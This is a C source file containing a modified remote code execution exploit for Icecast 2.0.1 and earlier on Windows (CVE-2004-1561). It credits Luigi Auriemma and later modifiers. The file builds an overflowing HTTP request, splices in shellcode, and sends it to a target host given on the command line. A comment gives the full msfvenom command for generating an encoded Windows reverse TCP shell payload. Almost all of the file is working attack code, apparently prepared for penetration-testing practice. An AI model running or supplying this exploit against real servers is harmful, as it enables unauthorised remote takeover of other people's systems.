Modified exploit for 2004-1561

2004_1561.c

/* 

Original Exploit by Luigi Auriemma 
Shellcode add-on by Delikon 
www.Delikon.de 
Original Exploit: https://www.exploit-db.com/exploits/568
Modifications made by @3lpsy

Modified version only compiles for linux. 
Shellcode created with:

$ msfvenom -p windows/shell/reverse_tcp LHOST=XXXX LPORT=443 -e x86/shikata_ga_nai --platform windows -f c -b '\x0d\x0a\x00'

*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
#include <sys/socket.h> 
#include <sys/types.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#include <netinet/in.h> 

#define VER "0.1" 
#define BUFFSZ 2048 
#define TIMEOUT 3

u_char EXEC[] = "GET / HTTP/1.0\r\n" 
    "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" 
    "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" 
    "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" 
    "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n"
    "\xcc";
    
    
// Place msvenom shellcode here:
unsigned char shellcode[] = "";

int timeout(int sock); 
u_long resolv(char *host); 
void std_err(void); 

int main(int argc, char *argv[]) { 

   printf("EXEC:\n");

    printf("%s\n", EXEC);
    struct sockaddr_in peer; 
    int sd; 
    short port = 8000; 
    u_char buff[BUFFSZ]; 
    u_char buf[4096]; 
    u_char *pointer=NULL; 


    setbuf(stdout, NULL); 

    fputs("\n" 
        "Icecast <= 2.0.1 Win32 remote code execution "VER"\n" 
        "by Luigi Auriemma\n" 
        "e-mail: [email protected]\n" 
        "web:http://aluigi.altervista.org\n" 
  "\nshellcode add-on by Delikon\n" 
  "www.delikon.de" 
        "\n", stdout); 

    if(argc < 2) { 
        printf("\nUsage: %s <server> [port(%d)]\n" 
            "\n", argv[0], 8000); 
        exit(1); 
    } 

    if(argc > 2) port = atoi(argv[2]); 
    printf("Port: %d\n", port);
    printf("Building peer socket...\n");
    peer.sin_addr.s_addr = resolv(argv[1]); 
    peer.sin_port = htons(port);
    peer.sin_family= AF_INET; 

    printf("Nullifying buff...\n");
    memset(buf,0x00,sizeof(buf)); 
    printf("Filling buf with EXEC...\n");
    strcpy(buf,EXEC);
   printf("Pointifying buff...\n");
    printf("Start of buf pointer: %p\n", (u_char *) &buf);
    pointer = strrchr(buf,0xcc); 
    printf("Inject Point Pointer: %p\n", pointer);
    printf("Copying shellcode to pointer...\n");
    strcpy(pointer,shellcode); 
    
    printf("Adding returns to buf...\n");
    strcat(buf,"\r\n"); 
    strcat(buf,"\r\n"); 
        

    printf("Target: %s:%hu\n", 
        inet_ntoa(peer.sin_addr), port); 
    printf("Creating socket...\n");
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
    if(sd < 0) std_err(); 

    printf("Connecting socket...\n");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) 
      < 0) std_err(); 

    printf("Sending malforemd data...\n");
    if(send(sd, buf, strlen(buf), 0) 
      < 0) std_err(); 

    printf("Awaiting confirmation of exploitation...\n");
    if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) { 
        fputs("\nServer IS vulnerable!!!\n\n", stdout); 
    } else { 
        fputs("\nServer doesn't seem vulnerable\n\n", stdout); 
    } 

    close(sd); 
    return(0); 
} 

int timeout(int sock) { 
    struct timeval tout; 
    fd_set fd_read; 
    int err; 

    tout.tv_sec = TIMEOUT; 
    tout.tv_usec = 0; 
    FD_ZERO(&fd_read); 
    FD_SET(sock, &fd_read); 
    err = select(sock + 1, &fd_read, NULL, NULL, &tout); 
    if(err < 0) std_err(); 
    if(!err) return(-1); 
    return(0); 
} 

u_long resolv(char *host) { 
    struct hostent *hp; 
    u_long host_ip; 

    host_ip = inet_addr(host); 
    if(host_ip == INADDR_NONE) { 
        hp = gethostbyname(host); 
        if(!hp) { 
            printf("\nError: Unable to resolve hostname (%s)\n", host); 
            exit(1); 
        } else host_ip = *(u_long *)(hp->h_addr); 
    } 
    return(host_ip); 
} 
void std_err(void) { 
        perror("An error happened. My Bad. \n"); 
        exit(1); 
}